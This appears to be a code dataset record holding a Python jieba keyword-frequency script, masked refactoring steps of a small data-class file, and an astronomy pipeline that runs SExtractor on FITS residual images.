"step-2": "<mask token>\n\n\nclass Datafunction(object):\n\n def __init__(self):\n self.series = []\n self.ref_point = RefObject()\n self.clAss = None\n self.first_time = None\n self.last_time = None\n self.id = None\n\n def set_series(self, series):\n self.series = series\n\n def set_time(self, first, last):\n self.first_time = first\n self.last_time = last\n\n def set_id(self, Id):\n self.id = Id\n\n def set_class(self, clAss):\n self.clAss = clAss\n\n def set_ref_object(self, pose, name, time, Id):\n self.ref_point.set_data(pose, name, time, Id)\n\n def get_series(self):\n return self.series\n\n def get_class(self):\n return self.clAss\n <mask token>\n <mask token>\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Datafunction(object):\n\n def __init__(self):\n self.series = []\n self.ref_point = RefObject()\n self.clAss = None\n self.first_time = None\n self.last_time = None\n self.id = None\n\n def set_series(self, series):\n self.series = series\n\n def set_time(self, first, last):\n self.first_time = first\n self.last_time = last\n\n def set_id(self, Id):\n self.id = Id\n\n def set_class(self, clAss):\n self.clAss = clAss\n\n def set_ref_object(self, pose, name, time, Id):\n self.ref_point.set_data(pose, name, time, Id)\n\n def get_series(self):\n return self.series\n\n def get_class(self):\n return self.clAss\n\n def get_id(self):\n return self.id\n <mask token>\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-4": "class RefObject(object):\n\n def __init__(self):\n self.pose = []\n self.name = []\n self.time = None\n self.id = None\n\n def set_data(self, pose, name, time, Id):\n self.pose = pose\n self.name = name\n self.time = time\n self.id = Id\n\n\nclass Datafunction(object):\n\n def __init__(self):\n self.series = []\n self.ref_point = RefObject()\n self.clAss = None\n self.first_time = None\n self.last_time = None\n self.id = None\n\n def set_series(self, series):\n self.series = series\n\n def set_time(self, first, last):\n self.first_time = first\n self.last_time = last\n\n def set_id(self, Id):\n self.id = Id\n\n def set_class(self, clAss):\n self.clAss = clAss\n\n def set_ref_object(self, pose, name, time, Id):\n self.ref_point.set_data(pose, name, time, Id)\n\n def get_series(self):\n return self.series\n\n def get_class(self):\n return self.clAss\n\n def get_id(self):\n return self.id\n\n def get_ref_point(self):\n return self.ref_point\n\n def get_first_time(self):\n return self.first_time\n\n def get_last_time(self):\n return self.last_time\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\r\n# encoding: utf8\r\n#from __future__ import unicode_literals\r\n\r\nclass RefObject(object):\r\n def __init__(self,):\r\n self.pose = []\r\n self.name = []\r\n self.time = None\r\n self.id = None\r\n def set_data(self,pose, name, time, Id):\r\n self.pose = pose\r\n self.name = name\r\n self.time = time \r\n self.id = Id\r\n \r\nclass Datafunction(object):\r\n def __init__(self,):\r\n self.series = []\r\n self.ref_point = RefObject()\r\n self.clAss = None\r\n self.first_time = None\r\n self.last_time = None\r\n self.id = None\r\n \r\n def set_series(self,series):\r\n self.series = series\r\n \r\n def set_time(self, first, last):\r\n self.first_time = first\r\n self.last_time = last\r\n \r\n def set_id(self,Id):\r\n self.id = Id\r\n \r\n def set_class(self, clAss):\r\n self.clAss = clAss\r\n \r\n def set_ref_object(self,pose, name, time, Id):\r\n self.ref_point.set_data(pose, name, time, Id)\r\n \r\n def get_series(self,):\r\n return self.series\r\n \r\n def get_class(self,):\r\n return self.clAss\r\n \r\n def get_id(self,):\r\n return self.id\r\n \r\n def get_ref_point(self,):\r\n return self.ref_point\r\n\r\n def get_first_time(self,):\r\n return self.first_time\r\n\r\n def get_last_time(self):\r\n return self.last_time\r\n \r\nif __name__ == '__main__':\r\n print(\"Hello\")\r\n",
"step-ids": [
3,
11,
12,
16,
18
]
}
|
[
3,
11,
12,
16,
18
] |
#!/usr/bin/env python
#coding:utf-8
import jieba.analyse as analyse
from collections import Counter
import time
from os import path
import jieba
import importlib, sys
importlib.reload(sys)
import csv
import pandas as pd
from pandas import DataFrame
jieba.load_userdict("newdict.txt")
d = path.dirname(__file__)
filepath = r'C:\Users\Lenovo\zqrbtest\redup.csv'
def removdup():
train = pd.read_csv(r'C:\Users\Lenovo\zqrbtest\data.csv')
train = train['titlec']
train = set(train)
data = pd.DataFrame(list(train), columns=['titlec'])
data.to_csv('redup.csv', index=False, encoding='utf_8_sig')
if __name__ == "__main__":
def stopwordslist(filepath):
stopwords = [line.strip()for line in open(filepath, 'r', encoding='utf-8').read().split('\n')]
rs2 = []
return stopwords
def seg_sentence (sentence):
sentence_seged = jieba.cut(sentence.strip())
stopwords = stopwordslist('stop.txt')
outstr = ''
for word in sentence_seged:
if word not in stopwords:
if word != '\t':
outstr += word
outstr += " "
return outstr
inputs = open('redup.csv', 'r', encoding='utf-8')
outputs = open('hel.csv', 'w', encoding='utf-8')
for line in inputs:
line_seg = seg_sentence(line)
outputs.write(line_seg + '\n')
outputs.close()
inputs.close()
if __name__ == "__main__":
aResult = removdup()
csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')
spamwriter = csv.writer(csvfile)
word_list = []
key_list = []
for line in open('hel.csv', 'r', encoding='UTF-8'):
item = line.strip('\n\r').split('\t')
tags = jieba.analyse.extract_tags(item[0])
for t in tags:
word_list.append(t)
word_dict = {}
with open("result3.txt", 'w') as wf2:
for item in word_list:
if item not in word_dict:
word_dict[item] = 1
else:
word_dict[item] += 1
orderList = list(word_dict.values())
orderList.sort(reverse=True)
for i in range(len(orderList)):
for key in word_dict:
if word_dict[key] == orderList[i]:
wf2.write(key + ' ' + str(word_dict[key]) + '\n')
key_list.append(key)
word_dict[key] = 0
for i in range(len(key_list)):
spamwriter.writerow((key_list[i], orderList[i]))
csvfile.close()
rf_path = 'wordcount.csv'
title = ['keyut', 'fre']
r2g = pd.read_csv(rf_path, header=None)
insertRow = pd.DataFrame([title])
r2g = insertRow.append(r2g, ignore_index=True)
df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding='utf_8_sig')
a = pd.read_csv('wordcount-1.csv')
a.set_index('keyut')
b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')
b.set_index('keyut')
c = pd.merge(b, a, on='keyut', how='left')
c.to_csv('collection.csv', encoding='utf_8_sig')
|
normal
|
{
"blob_id": "6f3aa4e1309745265bb9d79df5f5a352e54493f9",
"index": 6313,
"step-1": "<mask token>\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\n<mask token>\n",
"step-2": "<mask token>\nimportlib.reload(sys)\n<mask token>\njieba.load_userdict('newdict.txt')\n<mask token>\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\nif __name__ == '__main__':\n\n def stopwordslist(filepath):\n stopwords = [line.strip() for line in open(filepath, 'r', encoding=\n 'utf-8').read().split('\\n')]\n rs2 = []\n return stopwords\n\n def seg_sentence(sentence):\n sentence_seged = jieba.cut(sentence.strip())\n stopwords = stopwordslist('stop.txt')\n outstr = ''\n for word in sentence_seged:\n if word not in stopwords:\n if word != '\\t':\n outstr += word\n outstr += ' '\n return outstr\n inputs = open('redup.csv', 'r', encoding='utf-8')\n outputs = open('hel.csv', 'w', encoding='utf-8')\n for line in inputs:\n line_seg = seg_sentence(line)\n outputs.write(line_seg + '\\n')\n outputs.close()\n inputs.close()\nif __name__ == '__main__':\n aResult = removdup()\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\n spamwriter = csv.writer(csvfile)\n word_list = []\n key_list = []\n for line in open('hel.csv', 'r', encoding='UTF-8'):\n item = line.strip('\\n\\r').split('\\t')\n tags = jieba.analyse.extract_tags(item[0])\n for t in tags:\n word_list.append(t)\n word_dict = {}\n with open('result3.txt', 'w') as wf2:\n for item in word_list:\n if item not in word_dict:\n word_dict[item] = 1\n else:\n word_dict[item] += 1\n orderList = list(word_dict.values())\n orderList.sort(reverse=True)\n for i in range(len(orderList)):\n for key in word_dict:\n if word_dict[key] == orderList[i]:\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\n key_list.append(key)\n word_dict[key] = 0\n for i in range(len(key_list)):\n spamwriter.writerow((key_list[i], orderList[i]))\n csvfile.close()\n rf_path = 'wordcount.csv'\n title = ['keyut', 'fre']\n r2g = pd.read_csv(rf_path, header=None)\n insertRow = pd.DataFrame([title])\n r2g = insertRow.append(r2g, ignore_index=True)\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding=\n 'utf_8_sig')\n a = pd.read_csv('wordcount-1.csv')\n a.set_index('keyut')\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\n b.set_index('keyut')\n c = pd.merge(b, a, on='keyut', how='left')\n c.to_csv('collection.csv', encoding='utf_8_sig')\n",
"step-3": "<mask token>\nimportlib.reload(sys)\n<mask token>\njieba.load_userdict('newdict.txt')\nd = path.dirname(__file__)\nfilepath = 'C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\redup.csv'\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\nif __name__ == '__main__':\n\n def stopwordslist(filepath):\n stopwords = [line.strip() for line in open(filepath, 'r', encoding=\n 'utf-8').read().split('\\n')]\n rs2 = []\n return stopwords\n\n def seg_sentence(sentence):\n sentence_seged = jieba.cut(sentence.strip())\n stopwords = stopwordslist('stop.txt')\n outstr = ''\n for word in sentence_seged:\n if word not in stopwords:\n if word != '\\t':\n outstr += word\n outstr += ' '\n return outstr\n inputs = open('redup.csv', 'r', encoding='utf-8')\n outputs = open('hel.csv', 'w', encoding='utf-8')\n for line in inputs:\n line_seg = seg_sentence(line)\n outputs.write(line_seg + '\\n')\n outputs.close()\n inputs.close()\nif __name__ == '__main__':\n aResult = removdup()\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\n spamwriter = csv.writer(csvfile)\n word_list = []\n key_list = []\n for line in open('hel.csv', 'r', encoding='UTF-8'):\n item = line.strip('\\n\\r').split('\\t')\n tags = jieba.analyse.extract_tags(item[0])\n for t in tags:\n word_list.append(t)\n word_dict = {}\n with open('result3.txt', 'w') as wf2:\n for item in word_list:\n if item not in word_dict:\n word_dict[item] = 1\n else:\n word_dict[item] += 1\n orderList = list(word_dict.values())\n orderList.sort(reverse=True)\n for i in range(len(orderList)):\n for key in word_dict:\n if word_dict[key] == orderList[i]:\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\n key_list.append(key)\n word_dict[key] = 0\n for i in range(len(key_list)):\n spamwriter.writerow((key_list[i], orderList[i]))\n csvfile.close()\n rf_path = 'wordcount.csv'\n title = ['keyut', 'fre']\n r2g = pd.read_csv(rf_path, header=None)\n insertRow = pd.DataFrame([title])\n r2g = insertRow.append(r2g, ignore_index=True)\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding=\n 'utf_8_sig')\n a = pd.read_csv('wordcount-1.csv')\n a.set_index('keyut')\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\n b.set_index('keyut')\n c = pd.merge(b, a, on='keyut', how='left')\n c.to_csv('collection.csv', encoding='utf_8_sig')\n",
"step-4": "import jieba.analyse as analyse\nfrom collections import Counter\nimport time\nfrom os import path\nimport jieba\nimport importlib, sys\nimportlib.reload(sys)\nimport csv\nimport pandas as pd\nfrom pandas import DataFrame\njieba.load_userdict('newdict.txt')\nd = path.dirname(__file__)\nfilepath = 'C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\redup.csv'\n\n\ndef removdup():\n train = pd.read_csv('C:\\\\Users\\\\Lenovo\\\\zqrbtest\\\\data.csv')\n train = train['titlec']\n train = set(train)\n data = pd.DataFrame(list(train), columns=['titlec'])\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\n\n\nif __name__ == '__main__':\n\n def stopwordslist(filepath):\n stopwords = [line.strip() for line in open(filepath, 'r', encoding=\n 'utf-8').read().split('\\n')]\n rs2 = []\n return stopwords\n\n def seg_sentence(sentence):\n sentence_seged = jieba.cut(sentence.strip())\n stopwords = stopwordslist('stop.txt')\n outstr = ''\n for word in sentence_seged:\n if word not in stopwords:\n if word != '\\t':\n outstr += word\n outstr += ' '\n return outstr\n inputs = open('redup.csv', 'r', encoding='utf-8')\n outputs = open('hel.csv', 'w', encoding='utf-8')\n for line in inputs:\n line_seg = seg_sentence(line)\n outputs.write(line_seg + '\\n')\n outputs.close()\n inputs.close()\nif __name__ == '__main__':\n aResult = removdup()\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\n spamwriter = csv.writer(csvfile)\n word_list = []\n key_list = []\n for line in open('hel.csv', 'r', encoding='UTF-8'):\n item = line.strip('\\n\\r').split('\\t')\n tags = jieba.analyse.extract_tags(item[0])\n for t in tags:\n word_list.append(t)\n word_dict = {}\n with open('result3.txt', 'w') as wf2:\n for item in word_list:\n if item not in word_dict:\n word_dict[item] = 1\n else:\n word_dict[item] += 1\n orderList = list(word_dict.values())\n orderList.sort(reverse=True)\n for i in range(len(orderList)):\n for key in word_dict:\n if word_dict[key] == orderList[i]:\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\n key_list.append(key)\n word_dict[key] = 0\n for i in range(len(key_list)):\n spamwriter.writerow((key_list[i], orderList[i]))\n csvfile.close()\n rf_path = 'wordcount.csv'\n title = ['keyut', 'fre']\n r2g = pd.read_csv(rf_path, header=None)\n insertRow = pd.DataFrame([title])\n r2g = insertRow.append(r2g, ignore_index=True)\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding=\n 'utf_8_sig')\n a = pd.read_csv('wordcount-1.csv')\n a.set_index('keyut')\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\n b.set_index('keyut')\n c = pd.merge(b, a, on='keyut', how='left')\n c.to_csv('collection.csv', encoding='utf_8_sig')\n",
"step-5": "#!/usr/bin/env python\r\n#coding:utf-8\r\nimport jieba.analyse as analyse\r\nfrom collections import Counter\r\nimport time\r\nfrom os import path\r\nimport jieba\r\nimport importlib, sys\r\nimportlib.reload(sys)\r\nimport csv\r\nimport pandas as pd\r\nfrom pandas import DataFrame\r\n\r\njieba.load_userdict(\"newdict.txt\")\r\nd = path.dirname(__file__)\r\nfilepath = r'C:\\Users\\Lenovo\\zqrbtest\\redup.csv'\r\n\r\ndef removdup():\r\n train = pd.read_csv(r'C:\\Users\\Lenovo\\zqrbtest\\data.csv')\r\n train = train['titlec']\r\n train = set(train)\r\n data = pd.DataFrame(list(train), columns=['titlec'])\r\n data.to_csv('redup.csv', index=False, encoding='utf_8_sig')\r\n \r\nif __name__ == \"__main__\":\r\n def stopwordslist(filepath):\r\n stopwords = [line.strip()for line in open(filepath, 'r', encoding='utf-8').read().split('\\n')]\r\n rs2 = []\r\n return stopwords\r\n def seg_sentence (sentence):\r\n sentence_seged = jieba.cut(sentence.strip())\r\n stopwords = stopwordslist('stop.txt')\r\n outstr = ''\r\n for word in sentence_seged:\r\n if word not in stopwords:\r\n if word != '\\t':\r\n outstr += word\r\n outstr += \" \"\r\n return outstr\r\n inputs = open('redup.csv', 'r', encoding='utf-8')\r\n outputs = open('hel.csv', 'w', encoding='utf-8')\r\n for line in inputs:\r\n line_seg = seg_sentence(line)\r\n outputs.write(line_seg + '\\n')\r\n outputs.close()\r\n inputs.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n aResult = removdup()\r\n csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')\r\n spamwriter = csv.writer(csvfile)\r\n word_list = []\r\n key_list = []\r\n for line in open('hel.csv', 'r', encoding='UTF-8'):\r\n item = line.strip('\\n\\r').split('\\t')\r\n tags = jieba.analyse.extract_tags(item[0])\r\n for t in tags:\r\n word_list.append(t)\r\n\r\n word_dict = {}\r\n with open(\"result3.txt\", 'w') as wf2:\r\n for item in word_list:\r\n if item not in word_dict:\r\n word_dict[item] = 1\r\n else:\r\n word_dict[item] += 1\r\n\r\n orderList = list(word_dict.values())\r\n orderList.sort(reverse=True)\r\n for i in range(len(orderList)):\r\n\r\n for key in word_dict:\r\n if word_dict[key] == orderList[i]:\r\n wf2.write(key + ' ' + str(word_dict[key]) + '\\n')\r\n key_list.append(key)\r\n word_dict[key] = 0\r\n\r\n for i in range(len(key_list)):\r\n spamwriter.writerow((key_list[i], orderList[i]))\r\n csvfile.close()\r\n \r\n rf_path = 'wordcount.csv'\r\n title = ['keyut', 'fre']\r\n\r\n r2g = pd.read_csv(rf_path, header=None)\r\n insertRow = pd.DataFrame([title])\r\n r2g = insertRow.append(r2g, ignore_index=True)\r\n df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding='utf_8_sig')\r\n\r\n a = pd.read_csv('wordcount-1.csv')\r\n a.set_index('keyut')\r\n b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')\r\n b.set_index('keyut')\r\n c = pd.merge(b, a, on='keyut', how='left')\r\n c.to_csv('collection.csv', encoding='utf_8_sig')\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 4 13:04:32 2018
@author: andrew
"""
import os
import glob
import initialize
import psf
from astropy.io import fits
import filters
import numpy as np
import sys
import MR
from tqdm import tqdm
def sextractor_MR(location, MR_method='swarp', use_config_file=True):
'''
runs SExtractor on master residual
'''
check_MR = glob.glob("%s/residuals/MR.fits" % (location))
if check_MR == []:
print("-> Master residual does not exist, creating it first...")
if use_config_file == True:
MR_method = initialize.get_config_value('MR_method')
MR.MR(location, MR_method)
master_res = glob.glob("%s/residuals/MR.fits" % (location))
temp = glob.glob("%s/templates/*.fits" % (location))
if len(master_res) == 1:
if len(temp) == 1:
MR = master_res[0]
template = temp[0]
temp_name = template.split('/')[-1]
temp_name = temp_name[:-5]
MR_hdu = fits.open(MR)
MR_header = MR_hdu[0].header
saturate = MR_header['SATURATE']
temp_hdr = fits.getheader(template)
pixscale = temp_hdr['PIXSCALE']
MR_hdu.close()
FWHM = psf.fwhm_template(template)
config_loc = location + '/configs/default.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.param" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> SExtracting master residual...")
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[51] = "SATUR_LEVEL" + " " + str(saturate) + "\n"
data[62] = "SEEING_FWHM" + " " + str(FWHM) + "\n"
data[106] = "PSF_NAME" + " " + location + "/psf/" + temp_name + ".psf" + "\n"
data[58] = "PIXEL_SCALE" + " " + str(pixscale) + "\n"
data[32] = "WEIGHT_IMAGE" + " " + "%s[1]" % (MR) + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0]> %s/sources/MR_sources.txt -c %s" % (MR, location, config_loc))
temp_hdu_data = fits.PrimaryHDU((fits.getdata(MR))*-1, header=fits.getheader(MR))
temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))
temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])
temp_hdu_list.writeto("%s/residuals/MR_neg.fits" % (location))
os.system("sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s" % (location, location, config_loc))
append_negative_sources(MR, MR=True)
MR_filter_sources(location)
else:
print("-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual")
else:
print("-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual")
def sextractor(location):
'''
runs SExtractor on all residual images
'''
x = 0
sources = location + "/sources"
residuals = location + "/residuals"
check = os.path.exists(sources)
check_temp = os.path.exists(sources + '/temp')
length = len(residuals) + 1
if check == False:
os.system("mkdir %s" % (sources))
os.system("mkdir %s/temp" % (sources))
else:
if check_temp == False:
os.system("mkdir %s/temp" % (sources))
images = glob.glob(residuals + "/*_residual_.fits")
initialize.create_configs(location)
config_loc = location + '/configs/default.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.param" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("-> Converting all residual masks into weight maps...\n")
for r in tqdm(images):
weight = weight_map(r)
hdu = fits.open(r, mode='update')
data = hdu[0].data
hdr = hdu[0].header
try:
if hdr['WEIGHT'] == 'N':
hdr.set('WEIGHT','Y')
hduData = fits.PrimaryHDU(data, header=hdr)
hduWeight = fits.ImageHDU(weight)
hduList = fits.HDUList([hduData, hduWeight])
hduList.writeto(r, overwrite=True)
except KeyError:
hdr.set('WEIGHT','Y')
hduData = fits.PrimaryHDU(data, header=hdr)
hduWeight = fits.ImageHDU(weight)
hduList = fits.HDUList([hduData, hduWeight])
hduList.writeto(r, overwrite=True)
hdu.close()
try:
if fits.getval(r, 'NORM') == 'N':
fits.setval(r, 'NORM', value='Y')
MR.normalize(r)
except KeyError:
fits.setval(r, 'NORM', value='Y')
MR.normalize(r)
print("\n-> SExtracting residual images...")
for i in images:
name = i[length:-5]
data_name = location + '/data/' + name.replace('residual_','') + '.fits'
FWHM = psf.fwhm(data_name)
im_hdu = fits.open(data_name)
im_header = im_hdu[0].header
saturate = im_header['SATURATE']
pixscale = im_header['PIXSCALE']
im_hdu.close()
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[51] = "SATUR_LEVEL" + " " + str(saturate) + "\n"
data[62] = "SEEING_FWHM" + " " + str(FWHM) + "\n"
data[106] = "PSF_NAME" + " " + location + "/psf/" + name[:-9] + ".psf" + "\n"
data[58] = "PIXEL_SCALE" + " " + str(pixscale) + "\n"
data[32] = "WEIGHT_IMAGE" + " " + "%s[1]" % (i) + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0]> %s/temp/%s.txt -c %s" % (i, sources, name, config_loc))
temp_hdu_data = fits.PrimaryHDU((fits.getdata(i))*-1, header=fits.getheader(i))
temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))
temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])
temp_hdu_list.writeto("%s/residuals/temp.fits" % (location))
os.system("sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s" % (location, sources, name, config_loc))
append_negative_sources(i)
os.remove("%s/residuals/temp.fits" % (location))
x += 1
per = float(x)/float(len(images)) * 100
print("\t %.1f%% sextracted..." % (per))
print("-> SExtracted %d images, catalogues placed in 'sources' directory\n" % (len(images)))
print("-> Filtering source catalogs...\n")
src_join(location)
filter_sources(location)
def sextractor_sim(image):
location = image.split('/')[:-2]
location = '/'.join(location)
sources = location + "/sources"
check = os.path.exists(sources)
check_temp = os.path.exists(sources + '/temp')
if check == False:
os.system("mkdir %s" % (sources))
os.system("mkdir %s/temp" % (sources))
else:
if check_temp == False:
os.system("mkdir %s/temp" % (sources))
initialize.create_configs(location)
config_loc = location + '/configs/default.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.param" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> SExtracting fake image...")
name = image.split('/')[-1]
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[106] = "PSF_NAME" + " " + location + "/psf/" + name[:-5] + ".psf" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0]> %s/temp/%s.txt -c %s" % (image, sources, name, config_loc))
temp_hdu_data = fits.PrimaryHDU((fits.getdata(image))*-1, header=fits.getheader(image))
temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))
temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])
temp_hdu_list.writeto("%s/residuals/temp.fits")
os.system("sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s" % (location, sources, name, config_loc))
os.remove("%s/residuals/temp.fits" % (location))
src_join(location)
filter_sources(location)
def sextractor_psf(location):
x = 0
psf_loc = location + "/psf"
data = location + "/data"
templates = location + "/templates"
check = os.path.exists(psf_loc)
if check == False:
os.system("mkdir %s" % (psf_loc))
temps = glob.glob(templates + "/*.fits")
images = glob.glob(data + "/*_A_.fits")
for t in temps:
images.append(t)
cats = glob.glob(location + '/psf/*.cat')
images_names = [(i.split('/')[-1])[:-5] for i in images]
cats_names = [(c.split('/')[-1])[:-4] for c in cats]
imageCats = [im for im in images_names if im not in cats_names]
images = []
if temps == []:
temps.append('')
for imcats in imageCats:
if imcats == (temps[0].split('/')[-1])[:-5]:
images.append(temps[0])
else:
images.append(location+'/data/'+imcats+'.fits')
initialize.create_configs(location)
config_loc = location + '/configs/psf.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.psfex" + "\n"
data[19] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> Creating PSF catalogs...")
if len(temps) == 1:
for i in images:
name = i.split('/')[-1][:-5]
hdu = fits.open(i)
hdr = hdu[0].header
pixscale = hdr['PIXSCALE']
hdu.close()
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[6] = "CATALOG_NAME" + " " + psf_loc + "/" + name + ".cat" + "\n"
data[44] = "PIXEL_SCALE" + " " + str(pixscale) + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0] -c %s" % (i, config_loc))
x += 1
per = float(x)/float(len(images)) * 100
print("\t %.1f%% sextracted..." % (per))
print("-> SExtracted %d images, catalogues placed in 'psf' directory\n" % (len(images)))
else:
print("\n-> Error: Problem with number of template images\n")
sys.exit()
return images
def sextractor_psf_sim(location, image):
psf_loc = location + "/psf"
data = location + "/data"
check = os.path.exists(psf_loc)
length = len(data) + 1
if check == False:
os.system("mkdir %s" % (psf_loc))
initialize.create_configs(location)
config_loc = location + '/configs/psf.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.psfex" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> Creating PSF catalog of fake image...")
name = image[length:-5]
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[6] = "CATALOG_NAME" + " " + psf_loc + "/" + name + ".cat" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0] -c %s" % (image, config_loc))
def weight_map(image):
hdu = fits.open(image)
hduMask = hdu[1].data
zeroMask = np.zeros(hduMask.shape)
weightMap = (np.logical_not(np.logical_or(hduMask,zeroMask))).astype(float)
hdu.close()
return weightMap
def src_join(location):
source_loc = location + '/sources'
temp_source_loc = source_loc + '/temp'
temp_source_files = glob.glob(temp_source_loc + '/*.txt')
image_names = filters.get_image_names(location)
for file in temp_source_files:
with open(file, 'r') as fl:
data = fl.readlines()
data = [str(file.replace('txt','fits')[len(source_loc)+6:]) + '\n'] + data
data.append("\n\n\n")
with open(source_loc + '/sources.txt', 'a+') as s:
if data[0] not in image_names:
s.writelines(data)
os.remove(file)
try:
os.rmdir(temp_source_loc)
except:
print("-> Error: Problem removing temp directory in '/sources'")
def filter_sources(location, mask_sources=False):
print("\n-> Filtering out non PSF-like sources...")
filters.spread_model_filter(location)
print("-> Filtering out diveted detections...")
images = glob.glob(location + '/data/*_A_.fits')
for i in images:
indices = filters.divot(i)
filters.update_filtered_sources(location, indices)
residuals = glob.glob("%s/residuals/*_residual_.fits" % (location))
if mask_sources == True:
for r in residuals:
filters.mask_sources_image(r)
def MR_filter_sources(location):
with open("%s/sources/MR_sources.txt" % (location), 'r') as MR_src:
MR_lines = MR_src.readlines()
MR_lines.insert(0, "MR.fits\n")
with open("%s/sources/MR_sources.txt" % (location), 'w+') as MR_src:
for line in MR_lines:
MR_src.write(line)
MR_loc = "%s/residuals/MR.fits" % (location)
print("\n-> Filtering out non PSF-like sources in master residual...")
filters.spread_model_filter(location, MR=True)
print("-> Filtering out diveted detections in master residual...")
indices = filters.divot(MR_loc, MR=True)
filters.update_filtered_sources(location, indices, MR=True)
filters.write_total_sources(location)
def append_negative_sources(residual, MR=False):
location = residual.split('/')[:-2]
location = '/'.join(location)
name = residual.split('/')[-1]
name = name.replace('.fits', '')
if MR == True:
with open("%s/sources/%s_sources_2.txt" % (location, name), 'r') as neg_sources:
lines = neg_sources.readlines()
with open("%s/sources/%s_sources.txt" % (location, name), 'a') as sources:
for l in lines:
if l[0] != '#':
sources.write(l)
os.remove("%s/sources/%s_sources_2.txt" % (location, name))
else:
with open("%s/sources/temp/%s_2.txt" % (location, name), 'r') as neg_sources:
lines = neg_sources.readlines()
with open("%s/sources/temp/%s.txt" % (location, name), 'a') as sources:
for l in lines:
if l[0] != '#':
sources.write(l)
os.remove("%s/sources/temp/%s_2.txt" % (location, name))
|
normal
|
{
"blob_id": "6f5eda426daf5db84dc205f36ec31e9076acb8ee",
